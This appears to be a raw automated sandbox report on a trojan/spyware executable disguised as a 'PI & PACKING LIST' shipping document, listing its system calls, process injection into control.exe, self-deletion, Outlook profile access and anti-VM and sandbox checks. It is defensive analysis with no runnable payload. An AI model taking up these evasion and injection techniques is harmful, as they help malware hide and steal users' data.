      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130DFCE
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01256E30
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FD616
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01302EF7
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004012AA
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004211BD
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004223D6
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00422B89
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040B457
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004044C7
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004044BE
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004046E7
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040FE87
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: String function: 0123B150 appears 136 times
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012799A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012798F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012795D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012797A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012796E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012799D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012798A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A10 NtQuerySection,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279560 NtWriteFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012795F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279760 NtOpenProcess,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127A770 NtOpenThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012796D0 NtCreateKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E007 NtClose,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E0B7 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004012AA NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DED7 NtCreateFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DF87 NtReadFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E001 NtClose,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E0B3 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004014E9 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DE93 NtCreateFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DF81 NtReadFile,
      Source: PI & PACKING LIST.exe, 00000000.00000002.279173554.0000000006E90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000000.00000000.240444204.00000000001CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000002.00000002.355397019.000000000132F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000002.00000003.259681724.0000000000FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000002.00000003.261884863.0000000001191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exeBinary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: PI & PACKING LIST.exeReversingLabs: Detection: 76%
      Source: PI & PACKING LIST.exeVirustotal: Detection: 57%
      Source: PI & PACKING LIST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Windows\SysWOW64\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI & PACKING LIST.exe.logJump to behavior
      Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\71M40-2OQJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/2@6/5
      Source: PI & PACKING LIST.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: PI & PACKING LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: PI & PACKING LIST.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: PI & PACKING LIST.exe, Othello/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.PI & PACKING LIST.exe.d0000.0.unpack, Othello/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E4539 push esi; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E71E0 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E3206 push ebx; iretd
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0128D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040A0C9 push 7C55F36Ch; retf
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004210CC push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041A0DE pushfd ; iretd
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041B08A push CBA396CFh; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00421119 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00421122 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00421183 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040A1B8 push 0845B845h; iretd
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004054C4 push edx; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00419E80 push ebx; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.603845618377083

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\pi & packing list.exeJump to behavior
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM3
      Source: Yara matchFile source: 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: PI & PACKING LIST.exe PID: 6140, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 5128Thread sleep time: -42186s >= -30000s
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 6124Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01305BA5 rdtsc
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeAPI coverage: 6.1 %
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread delayed: delay time: 42186
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread delayed: delay time: 922337203685477
      Source: control.exe, 0000000D.00000002.510454015.00000000010D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
      Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
      Source: explorer.exe, 00000003.00000000.281178206.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
      Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
      Source: explorer.exe, 00000003.00000000.267722463.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01305BA5 rdtsc
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012C41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
